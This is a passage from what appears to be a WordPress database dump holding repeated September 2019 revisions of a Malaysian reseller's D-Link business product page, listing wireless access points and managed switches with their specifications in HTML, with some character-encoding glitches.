srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:31:38','2019-09-25 04:31:38','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3364,1,'2019-09-25 12:32:36','2019-09-25 04:32:36','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:32:36','2019-09-25 04:32:36','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3365,1,'2019-09-25 12:33:31','2019-09-25 04:33:31','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			